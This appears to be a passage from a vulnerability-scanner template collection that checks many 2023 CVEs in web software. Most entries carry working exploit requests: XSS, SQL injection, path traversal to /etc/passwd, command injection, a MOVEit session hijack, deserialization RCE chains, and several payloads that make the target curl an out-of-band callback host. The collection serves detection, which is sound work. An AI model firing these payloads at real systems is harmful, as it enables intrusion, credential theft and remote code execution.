application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4973","info":{"name":"Academy LMS 6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/academy/tutor/filter?searched_word=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_tution_class_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&price_min=1&price_max=9&searched_price_type%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0&searched_duration%5B%5D=acoa5\"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;dyzs0"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"List of tuitions\")"],"condition":"and"}]}]},{"id":"CVE-2023-43374","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /hoteldruid/inizio.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid</a>"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-37679","info":{"name":"NextGen Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <dynamic-proxy>\n        <interface>java.lang.Comparable</interface>\n        <handler class=\"java.beans.EventHandler\">\n            <target class=\"java.lang.ProcessBuilder\">\n                <command>\n                    <string>curl</string>\n                    <string>http://{{interactsh-url}}/</string>\n                </command>\n            </target>\n            <action>start</action>\n        </handler>\n    </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-50290","info":{"name":"Apache Solr - Host Environment Variables Leak via Metrics API","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/admin/metrics"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"responseHeader\":","\"solr.jetty\":","system.env"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43326","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-36347","info":{"name":"POS Codekop v2.0 - Broken Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/excel.php","{{BaseURL}}/pos-kasir-php/excel.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Document"]},{"type":"word","part":"header","words":["application/vnd.ms-excel"]}]}]},{"id":"CVE-2023-30625","info":{"name":"Rudder Server < 1.3.0-rc.1  - SQL Injection","severity":"high"},"requests":[{"raw":["POST /v1/warehouse/pending-events HTTP/1.1\nHost: {{Hostname}}\n\n{\"source_id\": \"test'; copy (SELECT '') to program '{{cmd}}'-- - \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["error getting pending"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero  - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '<pre>{{randstr}}</pre>') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"><script>alert(document.domain)</script>\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-32077","info":{"name":"Netmaker - Hardcoded DNS Secret Key","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/dns"],"headers":{"Authorization":"x secretkey"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/json\")","contains_all(body, \"{\\\"address\\\":\", \"\\\"network\\\":\", \"\\\"name\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n  \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-5074","info":{"name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dview8/api/usersByLevel HTTP/1.1\nHost: {{Hostname}}\nAuthorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS 